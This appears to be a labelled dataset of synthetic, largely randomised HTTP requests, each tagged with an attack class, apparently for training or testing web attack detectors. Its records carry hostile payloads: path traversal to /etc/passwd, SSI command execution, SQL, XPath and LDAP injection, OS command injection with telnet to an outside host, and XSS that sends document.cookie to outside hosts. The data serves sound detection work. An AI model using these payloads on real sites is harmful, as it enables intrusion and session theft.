X-Forwarded-For: 142.213.134.120
X-Serial-Number: 50534394193049437616
----: -----------
~~~~~: ~~~~~~~~~~~

null

End - Id: 36296
Start - Id: 36247
class: PathTransversal
GET /igrlbdRaiht/0Lo/-eRLerX5p_/an85eseedghlcseccit/tbe6n8/hscu5VeTZp8W/g4bfdcFMX0C.gif? HTTP/1.1
Host: www.t3iendgrC.fr:80
Connection: mlIoenn
Accept: */*;q=0.5
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: *;q=0.4
Client-ip: 146.162.66.142
Cookie: 9a3i2enaakyom=irEeB4yoloeh;o_Op=\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/etc\/passwd%00.html;hudnapretss=4~s8er;pfV.Cf4raccess_log=tsmeOrlIoiTfernd2e
Date: Sun, 09 Nov 08 02:14:30 UTC
Expect: 100-continue
From: gnun@ooTeaotBtr.de
If-Modified-Since: Sat, 27 May 06 16:53:21 GMT
If-Unmodified-Since: Thu, 08 Apr 04 02:27:58 CET
If-Range: "Rkj8pXJ1.9b.kusBXjTP"
Max-Forwards: 79
Authorization: q6aes oNgr=t7EO
Referer: /wavls/siphfa.js
User-Agent: kJ0qY1T http://www.onchf.com
UA-Pixels: 2569x5812
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36247
Start - Id: 40139
class: SSI
GET /el0n1oDwS/aftritehinnixh/g7BYBxFA.-5xaHDE.png?hyode6elr7go=%3C%21--+%23exec+++++cmd%3D%22%2Fbin%2Fls+++-l+++%2Fhome%2Fe0A5%2Freeite%22++++--%3E&eemeEG7=n4UYH&no=2241233&Xeoew=tss HTTP/1.0
Host: www.xt0sbopE.st:88003
Connection: keep-alive
Accept: image/*;q=0.8, video/*, video/quicktime
Accept-Charset: *
Accept-Encoding: *;q=0.3
Accept-Language: an-kgSenei9;q=0.8, nW-Ntsthgs
Cache-Control: no-cache
Client-ip: 246.182.239.2
Cookie: mrnhlgofnu=e3Ml;DP7feO=\:passwdn]
Cookie2: $Version="178"
Date: Fri, 09 Sep 05 18:07:28 UTC
ETag: W/"DCOhlC2QHZ8Da-F2_"
Expect: 100-continue
From: hthq3df@t0rsnSoda.org
If-Modified-Since: Tue, 23 Sep 08 17:43:18 CET
If-Unmodified-Since: Fri, 07 Nov 08 01:00:45 UTC
If-Match: "6xIEF6@p9@hnCzBLOw"
If-None-Match: *
If-Range: "mm@ggSt23lVZv6kDQ_"
Max-Forwards: 3
MIME-Version: 8.1
Pragma: no-cache
Proxy-Authorization: iici 6rR5nn=rdoeN9um
Authorization: dccce tifwhr=estwg
Range: 01-76865,-324119,86535-
Referer: http://mawv.uk/7hrp/ioWsrc.cgi
TE: chunked;q=0.7,chunked;q=0.4,trailers
Trailer: If-Modified-Since
User-Agent: ald0lB8WT http://www.Rvesytp.com
UA-Disp: 5908,939,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 159x553
Transfer-Encoding: identity
Warning: 318 191.70.190.146 "iieDaosahs2o" 
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40139
Start - Id: 49605
class: XPathInjection
GET /nX-tmnrC/tQNRlO.P732v/smrRrici.htm?lJ9hGmnbhM=%28i+++%3C+count%28aftt%2Fchild%3A%3Atext%28%29%29++and++++j+++%3C+count%28h7%2Fchild%3A%3Acomment%28%29%29++++and+++k++%3C++++count%28rmarf%2Fchild%3A%3A*%29++%29&tThntasemhyao=+mrwmochaishafv&Txp_pjUbadmink=u4yeOGxQNGaH&dr=nuf%26g+r%7CAS%7C%24edi&oeePvepdrIqm=ce5npuztc8ae&Srndqo=81809405&tjpk=i HTTP/1.0
Host: www.luoRgnh.it
Connection: close
Accept: application/zip, text/html;q=0.5
Accept-Charset: *
Accept-Encoding: compress, gzip, identity;q=0.5, compress
Accept-Language: ewnnnnb-hawntae, ta6-i;q=0.8, x8eenbof-ctsulP;q=0.4, he-etaynw;q=0.5
Cache-Control: t='gsjrat'
Client-ip: 225.109.131.162
Cookie: telnetOZx='aite;Q@Kg=76;oyj-mSy9POu=nhlseNn'iHutao
Cookie2: $Version="97"
Date: Fri, 12 Nov 04 05:07:11 CET
ETag: "OmYn45rY5Z5qYtyD0"
Expect: 100-continue
From: tdaOt@esEtnmNs.it
If-Modified-Since: Sat, 09 Jul 05 22:55:08 UTC
If-Unmodified-Since: Mon, 25 Aug 08 17:06:42 CET
If-Match: "eHujKSEypHPDUITto0m@"
If-None-Match: "9pggvc4YLE85.tCAZzy5"
If-Range: Tue, 05 Oct 04 05:56:11 UTC
Max-Forwards: 1
MIME-Version: 9.4
Pragma: x=e6
Proxy-Authorization: Hsia5 4xaft=eores4
Authorization: Digest uri=/rreszL5t/vca8O8/mriOJfT/shqsigjb/ne5etolo.mp3
Range: 7852-
Referer: http://www.atths.gov/onMuooio.asp
TE: chunked,trailers,deflate
Trailer: Via
User-Agent: Mozilla/6.9 (X11; U; Linux i386 1.2; ea-cj; rv:7.4.3) Gecko/13349411
UA-CPU: 68000
UA-Disp: 1997,806,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 3223x940
Via: 9.3 254.138.25.168:6483
Transfer-Encoding: teeth; aohrR1ca=tdssarr
Upgrade: add/2.5
Warning: 760 227.98.126.37 "nIw39hepCclatnett8" "Tue, 06 Nov 07 04:36:32 GMT"
X-Forwarded-For: 94.116.73.204
X-Serial-Number: 9696710
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49605
Start - Id: 48045
class: XSS
GET /5fm4/h%u91gOiLkaccept/t42-z9J57RrTcgx.j.js?tnfe3ide=%3C%21%5BCDATA%5B%3C%21--%5D%5D+%3E%3Cscript%3E%5Bdocument.location.replace++%28%27http%3A%2F%2Fwww.aresorar.com%2Fcgi-bin%2Fieli.cgi%27%2Bdocument.cookie%29%3B%5D%2F%2F--%3E%3C%2Fscript%3E HTTP/1.0
Host: 110.251.62.56
Connection: close
Accept: text/*, video/quicktime
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: a='EWd'
Client-ip: 252.198.126.142
Cookie: a3ituwied=rs8tBOXC;vhayimdoev=5
Cookie2: $Version="8"
Date: Tue, 08 Jul 08 13:12:13 UTC
ETag: "qT9P7oUFUTP5lg5O"
Expect: anmte=7mtotl;taCmh=mwueaUo
From: elwwua@EmhIEncw.it
If-Modified-Since: Fri, 17 Nov 06 12:40:11 CET
If-Unmodified-Since: Fri, 29 Aug 08 05:57:08 GMT
If-Match: "5Zo9n_zWHv2coNR"
If-None-Match: *
If-Range: Thu, 28 Jan 10 20:01:09 GMT
Max-Forwards: 0
MIME-Version: 6.0
Pragma: no-cache
Proxy-Authorization: jae8sr 0tnaix=eudc
Authorization: Digest qop=auth-int
Range: -2,4927-,7358-69
Referer: http://www.0roi2.de/ntJn3t/iddtqRA/retgtnt/ealbooI.txt
TE: trailers
Trailer: Accept-Charset
User-Agent: nriMNJ http://www.unhoa.com
UA-CPU: StrongARM
UA-Disp: 0372,351,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 9126x119
Via: 9.0 www.t33pa.tiff, oh3i6e/3.3 68.53.176.230
Transfer-Encoding: f0ac; marvnnn=q1d7E
Upgrade: ohr/0.8, dird/9.6, ccspda/7.4, eaonS/0.7, xbT1yr/6.0
Warning: 931 43.142.35.211 "tUI3qeeCt" "Mon, 16 Feb 04 11:58:32 CET"
X-Forwarded-For: 188.45.251.30
X-Serial-Number: 405569074263988888
----: -----------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 48045
Start - Id: 46907
class: XSS
POST /iayiunaderyo0euhsga/Jswp-Jku66havingZ6Chtpass/oBRW0IPe1knfpZoOj1y/vBmW6clikeYPe/connect0dbO0B2Ddelete/2k/aiAv_cOUnc9wxFlKSo/neeesffsprkelihtczbL/a2oEGD/iqlpqwtebentett0it3.php3? HTTP/1.0
Content-Length: 257
Content-Language: eb0s,tl2Re,9esh
Content-Encoding: gzip
Content-Location: /r9T5s/bfem2/thtnirei/aoot.png
Content-MD5: TnJjbm9sNWl0dG9lZGVvTg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 01 Apr 08 20:20:19 UTC
Last-Modified: Sat, 17 Jan 09 07:59:21 CET
Host: www.Sgtibt.cz
Connection: keep-alive
Accept: image/png, image/jpeg;q=0.2
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: *
Cache-Control: min-fresh=91
Client-ip: 44.189.197.231
Cookie: glumbe=3764;ivateeJ=ros8iawe mh1s;nd=nartnautoexecsaaautoexeccsf;pounoe2h=cbc@eallhrysexec1t[ 
Cookie2: $Version="07"
Date: Thu, 09 Dec 04 01:59:57 CET
ETag: "t@UnAXUQXOo_-9kX"
Expect: E2exe=EsamTnl
From: 2rcqsd@eottar.fr
If-Modified-Since: Tue, 23 Jan 07 04:24:31 CET
If-Unmodified-Since: Thu, 08 Apr 04 15:43:44 GMT
If-Match: *
If-None-Match: "4ntYqkjENfVbwWTtt"
If-Range: "HZ_8apbmB3tOsH-"
Max-Forwards: 5
MIME-Version: 9.1
Pragma: autu=r
Proxy-Authorization: NTLM Y2NlbUFhZmIzc3JobmUwMm14bGVyZWlpbWk4eGVUZzJocmVodGluRWl4aXRuaVo=
Authorization: Digest opaque="ntdla"
Range: -790
Referer: /tpattrz/msalr/hc1i8E.nsf
TE: trailers,trailers
Trailer: Expect
User-Agent: Mozilla/4.9 (compatible; MSIE 9.5; Open BSD i386; beg3E; hlSt)
UA-CPU: MIPS
UA-Disp: 628,380,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 8473x700
Via: 3.4 www.asiZl.jpeg:817, 4.3 www.96Se0b.jpg
Transfer-Encoding: deflate
Upgrade: sdW/7.9, agrd/5.9, wt6wa9/7.2
Warning: 749 124.119.94.150:741 "rcapb76l7ke" "Tue, 13 Dec 05 01:19:14 GMT"
X-Forwarded-For: 59.28.178.137
X-Serial-Number: 3374825125599046
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

4isiri5sn=<xml   id=   "    X  "  ><a ><b>&lt;script>[document.location.replace    ('http://www.ntennsen.com/cgi-bin/nela.cgi'+document.cookie);]&lt;/script  >;</b    ></a ></xml>

End - Id: 46907
Start - Id: 46170
class: PathTransversal
GET /nrf--L/ehtEj9UV.tiff?oEeas1pooeelto=aMeUIcujqQG1&72ks=%3F%3E&hoEdOFreoi8=%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd&aahounemgrcyb=ed HTTP/1.0
Host: 232.92.128.10
Connection: e0tsluba
Accept: image/*, application/*;q=0.0
Accept-Charset: iso-8859-4, hz-gb-2312
Accept-Encoding: deflate;q=0.3
Accept-Language: ycaubf-rQcmgh, eafimzAl-kS;q=0.8, rch-esdo, oe-e;q=0.0
Cache-Control: min-fresh=0364
Client-ip: 52.114.67.108
Cookie: ysht=ue;enycdvosodison0=901902067;e0heoceuxZg=rebn;uh3rxIe5iPr=dtrpsfazsxhuniono];innchi4o=ean1lboot.inioeta;go1uaIlsu5=23722
Cookie2: $Version="7"
Date: Sat, 05 Aug 06 13:37:53 UTC
ETag: "XxIGPTgMgE9f0ZK"
Expect: 4pnWf5e
From: 6lheepoq@m7ihelwj.gov
If-Modified-Since: Sun, 25 Sep 05 22:03:52 CET
If-Unmodified-Since: Thu, 01 Jul 04 06:11:24 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 01 Jul 08 06:29:27 CET
Max-Forwards: 741
MIME-Version: 6.1
Pragma: no-cache
Proxy-Authorization: ntos8l Aeggh=whqufdhi
Authorization: Digest username="nId1rsoO"
Range: -51066
Referer: /Yypscstn/ga8b5s.fgf
TE: trailers,trailers
Trailer: Proxy-Authorization
User-Agent: tod3edsfaetaata1st
UA-CPU: StrongARM
UA-Disp: 5013,9581,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 939x7286
Via: 6.9 63.96.226.125
Transfer-Encoding: gzip
Upgrade: efs/0.6
Warning: 823 25.141.143.47 "taoks5" "Fri, 20 May 05 04:28:26 GMT"
X-Forwarded-For: 249.22.33.20
X-Serial-Number: 143207616945
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46170
Start - Id: 47884
class: XSS
GET /fULQ@ndiAsZ-/iIgu.shtml?AeinHU4AX=r%3C%26&selectNtl=39627032&a5saYNo=2ydknae&eniwearaeis=netcs&sfpb1stas4=09245&Shhte=zsticieserhed&awm6rfh8opbrE=hs%26ehtpassdo%24%40hyot&oih4khamieodcd=eRba&Oasgliteifb5=641435323&Zne.R3JNj=1&e0m=a5a&otd=5i&eaud8=%3Cbody+++onload++%3D%22++%5Bdocument.location.replace+++%28%27http%3A%2F%2Fwww.sear.com%2Fcgi-bin%2Fli.cgi%27%2Bdocument.cookie%29%3B%5D%22+++%3E HTTP/1.0
Host: 44.187.66.232
Connection: keep-alive
Accept: */*
Accept-Charset: shift_jis
Accept-Encoding: identity
Accept-Language: *
Cache-Control: no-store
Client-ip: 85.234.191.196
Cookie: 9stVrY=93892
Cookie2: $Version="411"
Date: Sun, 29 Jul 07 17:47:27 UTC
ETag: "akDYjrMMwhr7w8IY8-9I"
Expect: 100-continue
From: clrwp@noorqoy.ch
If-Modified-Since: Fri, 25 Feb 05 22:17:51 UTC
If-Unmodified-Since: Fri, 09 Mar 07 24:38:40 CET
If-Match: "1Mqhh3gYZC5sv7k"
If-None-Match: "Hig5rFfFToO1i@ETXp"
If-Range: Fri, 20 Jan 06 03:29:16 CET
Max-Forwards: 27
MIME-Version: 2.7
Pragma: eeilXqap='Hc8keosg'
Proxy-Authorization: Digest qop=auth
Authorization: Digest algorithm=sa5s7ath
Range: 064-,-6198,422476-
Referer: /yi2ym/2lh1eecs/9dhItWo/xrl1dAm/eeeiy.cgi
TE: chunked
Trailer: If-Unmodified-Since
User-Agent: Mozilla/6.2 (Machintosh; U; Mac OS X 9.5; eU-lh; rv:4.8.6) Gecko/61016949
UA-CPU: StrongARM
UA-Disp: 213,2027,8
UA-OS: Solaris
UA-Pixels: 084x9415
Via: 5.2 238.141.45.126, 2.3 182.78.149.95, 2.4 216.7.36.205:57
Transfer-Encoding: compress
Upgrade: dglC/5.9, mee/7.3, oitlI/6.9, acmtu/7.6
Warning: 467 236.48.115.46:4 "dhenjbbwtagatsai" "Wed, 29 Mar 06 13:58:45 UTC"
X-Forwarded-For: 129.38.22.254
X-Serial-Number: 8754080340538
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47884
Start - Id: 38996
class: LdapInjection
GET /yswg/cLSZvlxGd3z0LwnYc@/mc8DK9ZPK8l-NfzIvJ0/mekS/o8satwusgVs1Ua/K-jXRM/eEng3nHtjyh/h5scwIennud/sianH/odeox0oesdaee.png?siusfroetontwa=2&tae=gA&jsw=5501&httpshttpsc6Kw-echoJ=EkpIy4&tknNfohRti=ud7skectg&8perlK2mk=an&Eb=lao%29%28%26%28objectClass++%3D+++2bx*%29&netdnt=t5ssQv+istn&sh1q=4&Pi4ocaraclp=4060659&TGbpfz=244&gl=aaz&KHP25access_logNA=7202098870 HTTP/1.0
Host: 66.181.195.140
Connection: jaae
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: c-itiicgs;q=0.1, iyx-oasm, tut-aolttiB, pdskwAw-teh;q=0.0, ee5-uatot;q=0.3
Cache-Control: only-if-cached
Cookie2: $Version="2"
Date: Fri, 05 May 06 22:30:29 UTC
ETag: W/"D4kBkEp7RtEZDZU7qq"
Expect: 100-continue
If-Modified-Since: Sat, 18 Sep 04 08:15:57 CET
If-Unmodified-Since: Sun, 30 Sep 07 09:41:27 GMT
If-Match: *
If-None-Match: *
If-Range: "bEQM14it5HWDdXlWuy9F"
Max-Forwards: 1999
MIME-Version: 9.7
Pragma: no-cache
Authorization: Digest uri=http://www.eojhr.gov/tubu/Fsoe/2aoiAw.tar
Range: -4
Referer: /ePnspep.gif
Trailer: From
User-Agent: Mozilla/4.9 (Machintosh; U; PPC 4.8; oe-6o; rv:1.7.3) Gecko/56741616
UA-CPU: StrongARM
UA-Disp: 542,569,16
UA-OS: Windows 98
Via: HTTP/6.7 www.pErme.html, dNam/2.3 71.43.22.223, HTTP/3.6 108.89.135.8
Transfer-Encoding: identity
X-Serial-Number: 2731422703648766
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38996
Start - Id: 37362
class: LdapInjection
GET /@connectmetaRqbtIjAYiframeqm/isTpiedwhea1u3c1/1-2pdFzg/dIrkRTJ/eRgrg3fgs.jpg?ahSnat=phpdsh%24t&ul=tXfiD4R5&rnmoexeaicdsl=648478&scoubosn=7&idrasgfha0e=tnce&swhdeaad2ao9ph=50863108&gBiAShCFR=6336&glnturenl=90763805&7aotcse1iJ4eo8=3%2Bwgetw%3DeMxne&EF0B@tmp.fromW=1 HTTP/1.1
Host: 97.18.82.217
Connection: close
Accept: audio/*;q=0.2, video/*, text/html
Accept-Charset: *;q=0.1
Accept-Encoding: ) (    |    ( cn=*o    'brien*  )(mail =*o  'brien* )    
Accept-Language: tspyueRn-eoHadt, refisx1-na
Cache-Control: only-if-cached
Client-ip: 117.148.34.106
Cookie: 47X_I58kpwM= iframeiahcEUnhf-aeodn;rrdJlee=iswn)
Cookie2: $Version="89"
Date: Sun, 02 Aug 09 22:47:17 GMT
ETag: W/"1sErXqkCyucdByw"
Expect: osmxe2=dnrEhje;ehUcdt
From: zhwiybw@hehuAUa89a.fr
If-Modified-Since: Tue, 30 Dec 08 05:44:22 GMT
If-Unmodified-Since: Sun, 23 Mar 08 02:09:10 UTC
If-Match: "bblF.5q2rQrF.1M3ue"
If-None-Match: "wNpxZVFBdjNY-Ay"
If-Range: Mon, 15 Mar 04 13:17:35 CET
Max-Forwards: 9
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: Basic b3NuZXI6Z0FvdWU=
Authorization: NTLM YXZuZWFpdGVoc29PcGZlZVRjcnU3aGVodGNteXQ0bmlhbm1sb3RjNWFyc2hlZQ==
Range: 257723-74,-66
Referer: /Nsoa3e/eszR.cgi
TE: deflate,gzip;q=0.0,trailers
Trailer: Accept-Language
User-Agent: 649)(&(objectClass=ecel)(|(sn    =   re0)(cn=l   J*))
UA-CPU: x86
UA-Disp: 794,0889,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 5121x090
Via: zc3i/6.8 www.eeeDpg.png, 8.1 233.174.254.51
Transfer-Encoding: emee
Upgrade: oie/1.4, esndns/6.8, eengr0/5.0, e7la1/2.5
Warning: 063 211.26.149.166 "smbe8tiNrn" "Sat, 11 Mar 06 17:33:18 CET"
X-Forwarded-For: 231.143.90.28
X-Serial-Number: 30089699
----: -----------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 37362
Start - Id: 46257
class: PathTransversal
GET /tihlnpunrnEsieoo/en/dyrlskat/ithdate/mLZXo6c9-j5/3@k/tgoe7BTtpcC.N/wpE7cXipgtQV-J/3EzUCJLjxFKuhJGeBYl.swf?3nvc04os9Tpylsi=costtdwtn%7Ctho%40id&n3O=shtd&ihpIwpi3a=%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2F7mmeu.conf&p7nrliy9ri=aobjecto+o&s26ed3easig=r5dlnC8e HTTP/1.0
Host: www.pg5neu.net
Connection: keep-alive
Accept: application/*;q=0.9
Accept-Charset: *
Accept-Encoding: identity;q=0.6, compress;q=0.3
Accept-Language: *;q=0.1
Cache-Control: no-cache
Client-ip: 190.79.101.95
Cookie: l6oOue=lnK6E
Cookie2: $Version="7"
Date: Tue, 15 Nov 05 12:41:45 GMT
ETag: "_9L1EBmUlyekels"
Expect: lbdrls=ACfiR
From: o8nret@EbsFqo4s.st
If-Modified-Since: Thu, 19 Oct 06 21:49:57 UTC
If-Unmodified-Since: Mon, 17 Dec 07 16:34:11 CET
If-Match: "Xa02q5HN@zg50h0"
If-None-Match: "sLmj3ROUKuDqC0iagaJ"
If-Range: Sun, 14 Jun 09 10:23:41 UTC
Max-Forwards: 9
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: NTLM eXJRM2xlZHJodDRlMmtnN3dyYWV0ZWd1YWVxaWFFdmcxZWVlb2xpc2Fv
Authorization: NTLM dDJOdDA2dGZhcExXZTBlYXNlMnJhcmVwYWhlYVM4bkFjaWJkdA==
Range: 5263-
Referer: /eeasdye/dgewled/iaoezt/y2al.tar.gz
TE: trailers,deflate
Trailer: If-Modified-Since
User-Agent: Mozilla/1.5 (Machintosh; U; Mac OS X 8.0; in-ez; rv:1.6.5) Gecko/26643021
UA-CPU: 68000
UA-Disp: 5467,9007,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 5939x660
Via: HTTP/1.9 www.SnE50.css, eth/8.7 34.210.172.206:0, 1.0 www.wi5lsid.html
Transfer-Encoding: compress
Upgrade: roeie/1.4
Warning: 961 59.212.87.203:1 "2ryq" "Mon, 19 Mar 07 07:17:54 UTC"
X-Forwarded-For: 196.41.114.153
X-Serial-Number: 1060683
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46257
Start - Id: 44047
class: OsCommanding
GET /scripts/file.bat" & dir c:/ .com? HTTP/1.0
Host: 28.21.216.175:80
Connection: a5aanw
Accept: text/*;q=0.9, image/*;q=0.7
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: jatad9a-csu2I, hnno-rwnNdr;q=0.4
Cache-Control: no-transform
Client-ip: 11.19.174.55
Cookie: gweadrIstev=omtarinf ce;a7=sdnj;ahtwmhboaoo=oMJK.
Cookie2: $Version="20"
Date: Thu, 20 Apr 06 17:28:24 GMT
ETag: W/"Li@1xMYgprnknCP5zgmr"
Expect: 100-continue
From: 2eEemxwf@fedDctiae.gov
If-Modified-Since: Sat, 30 May 09 20:22:03 CET
If-Unmodified-Since: Mon, 23 Jul 07 12:04:54 GMT
If-Match: *
If-None-Match: "cvZ-j7azdGPgm9I4"
If-Range: Thu, 07 Sep 06 19:54:54 UTC
Max-Forwards: 46
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: 3kfrae lae59lhs=Se9l
Authorization: Basic ZW5hc2k6anJuYW9ueWE=
Range: 70-,-5,-65
Referer: http://eea3e4.uk/sems.jpg
TE: trailers,chunked
Trailer: Authorization
User-Agent: wu29wtsiecnqu1eq
UA-CPU: PowerPC
UA-Disp: 6819,8710,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 695x429
Via: deaoxc/4.0 29.20.165.153:913
Transfer-Encoding: gzip
Upgrade: Eaxve/8.7, yk0s/2.8
Warning: 003 www.easrIe.js "dEiywrccwaehsomosn" "Sun, 28 Mar 04 08:37:49 UTC"
X-Forwarded-For: 55.100.34.25
X-Serial-Number: 204643043550
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44047
Start - Id: 43271
class: OsCommanding
GET /rrDKc7C3Pf9e/emj47o/TP/aonA7oidxoeldgt/60x/sGd7y1KCY-7.nsf?a9o=iBrSunbwgetn+kRtea+&MbiYKlou8n=irtihw0arts+h&.cSHwp-scriptywp-SscriptKh=%5C%22++++%5C%3B+%5C%2Fusr%5C%2Fbin%5C%2Ftelnet++++www.nsnsindend.com+++816+++++%3B&emt3acn=dixp_Eadrophuxtermchildeewi7ePf&enptinpOnprnino=68788624&ecrriuinE7aa=icoro7srx&ijpthbneruhs0i=eeuyyherioomh3jzy&btzih7iiaUsIr=baet&Dh0hruogHliuh=0rioiframeaeiHs+sCfeed&Saemolnahinitd3=eEDb1X0&rpyHaccess_logxF1W=95107193 HTTP/1.1
Host: www.fomeTsd.st
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: only-if-cached
Client-ip: 116.247.114.110
Cookie: eg=8i;meta7CA=i-HF;iOsystem7Vm=wntdo5&9e;emleygdrcnRt=67258735;lrt=wftphopens;guetaoasns7=uhsfni0ct
Cookie2: $Version="118"
Date: Tue, 22 Feb 05 06:27:55 GMT
ETag: "PEioMFbnQm-_spjg_"
Expect: b1t3F5ik=ccEnhleR;tysne=masht6
From: heEwPmnx@hafimu3.ch
If-Modified-Since: Tue, 17 Jun 08 01:42:49 CET
If-Unmodified-Since: Sat, 12 Mar 05 19:13:53 CET
If-Match: "O_-kZz9GkW_-wJe"
If-None-Match: "i6IRoZvzAP90gAs3PG"
If-Range: "7otNb1OZzov0mBdD"
Max-Forwards: 0
MIME-Version: 9.7
Pragma: j='eereeA'
Proxy-Authorization: Digest response="0B3cEb0aBbFc900Db7cC68fE50d55Ca6"
Authorization: Digest opaque="letle"
Range: 6444-90250,-039,9-0896
Referer: http://www.criy.uk/phxenbL3/I5di/onat1mss/rmuyu.asp
TE: trailers,trailers,chunked;q=0.1
Trailer: If-Range
User-Agent: Mozilla/7.1 (Windows; U; WinNT 0.7; oo-oh; rv:4.1.0) Gecko/25100297
UA-CPU: 68000
UA-Disp: 9170,0027,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 842x6548
Via: 7.9 www.zm0t.tiff:79
Transfer-Encoding: gzip
Upgrade: ssdcl/3.5, Oax6/1.8, llo84/6.7, sec/1.4, rnduC/7.6
Warning: 934 17.5.242.239 "e3Wid9U2agIl" "Sat, 08 Aug 09 05:17:30 GMT"
X-Forwarded-For: 160.47.213.152
X-Serial-Number: 5980220981423198
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 43271
Start - Id: 35240
class: SqlInjection
GET /eAXWx@mWjbb41579u/eP.dll?rnehtc=%27+++UNION+++++++ALL++++++++++SELECT++br+++FROM+++tu79fT+++++WHERE+++%27%27++%3D++%27 HTTP/1.1
Host: www.aiaeeile.biz
Connection: keep-alive
Accept: application/*;q=0.4
Accept-Charset: *
Accept-Encoding: compress;q=0.1
Accept-Language: wC9ma81-jdneouE, malzhh0c-s;q=0.6, y-ehlnn4lt, f-cEkd7om;q=0.5
Cache-Control: a=cxj
Client-ip: 61.19.198.20
Cookie: ouainuzylonbet=zDRfMXxM;i9ttosTechaeog6=0753;tjn=08794545;ea074toaifw=eothttp;8u3dxeivnmiyh=oraua;aledsl=d0
Cookie2: $Version="78"
Date: Thu, 21 May 09 06:55:07 GMT
ETag: W/"nMX2urdi29dkIXdpcQr"
Expect: 100-continue
From: gntsv@tqrstsoo.be
If-Modified-Since: Sat, 08 Jan 05 11:57:59 CET
If-Unmodified-Since: Wed, 01 Feb 06 07:14:54 CET
If-Match: *
If-None-Match: "u@n7WOILmY3RFfg4@U"
If-Range: "DHdhqF2KTLqOpkX"
Max-Forwards: 717
MIME-Version: 1.1
Pragma: 0ero8='uumyr'
Proxy-Authorization: Basic UmxkaXJ0OjNlaXU=
Authorization: Digest realm
Range: 233007-
Referer: http://A6gm.fr/sma7waR/sot4yd/e0re.doc
TE: trailers,trailers,trailers
Trailer: Warning
User-Agent: Mozilla/1.5 (Windows; U; Win 9x 8.4; p8-in; rv:6.9.7) Gecko/38813916
UA-CPU: 68000
UA-Disp: 1181,695,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 0990x1742
Via: HTTP/4.5 103.188.40.183, FTP/6.5 253.143.108.102
Transfer-Encoding: compress
Upgrade: rtrrq0/4.2, nltst/2.4, Sic/2.9, oaewts/4.5
Warning: 389 www.eetaIMn.js "i6iB7Cled" "Wed, 06 Jan 10 21:20:43 GMT"
X-Forwarded-For: 253.219.42.72
X-Serial-Number: 514695691907
----: -----------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 35240
Start - Id: 47227
class: XSS
GET /pj/Jsq1Gb6OLDLxJWE/zAiQU-VdXS/dta9senafl2d/div2yb8pzQ059LPH/i3p.cgi?ntaoq3wsn=%3Cbgsound++++src+%3D%22++javascript%3A+%5Bdocument.location.replace++%28%27http%3A%2F%2Fwww.nete.com%2Fcgi-bin%2Fng.cgi%27%2Bdocument.cookie%29%3B%5D++%22++%3E&eniut9=4656847&SsxeTalthxale=1567388&bmtAhutmr2Od=%3Cuqhl&hrhdsltht=3e31ndT4edtMadma&ti7ibenDt=foc%29eogroup+byopenvpdropiiolA&petc0eAbyye=489168&eene6y=+rl&4Odwan3otstatcn=oSnneiasy HTTP/1.1
Host: 250.103.209.72
Connection: close
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: identity;q=0.2, identity, compress;q=0.8
Accept-Language: icdfv-kolop03;q=0.3, hee-i2tefdij, o-1ee, zcs-ei7bziet, A9setAy-qemnaTap;q=0.2
Cache-Control: no-cache
Client-ip: 40.248.52.118
Cookie: 69Xl=o4zldb0Bbq;tlxg=2sl2aN;eee4baemsoi=ibZXVXx46
Cookie2: $Version="97"
Date: Wed, 18 Oct 06 20:46:02 GMT
ETag: "1GrtRjyzVjvgoMOl2e"
Expect: 100-continue
From: oreAv@osmi3u.be
If-Modified-Since: Sun, 11 Mar 07 12:02:40 GMT
If-Unmodified-Since: Mon, 29 Jan 07 16:02:49 CET
If-Match: "0Lui-Brj1HpGiLMW38"
If-None-Match: *
If-Range: "UhPyn8-zAtOU2qhszX"
Max-Forwards: 059
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: Basic bW5kZ2VrbmU6dWVja2FoaXA=
Authorization: Digest username="pwrd"
Range: 60-99
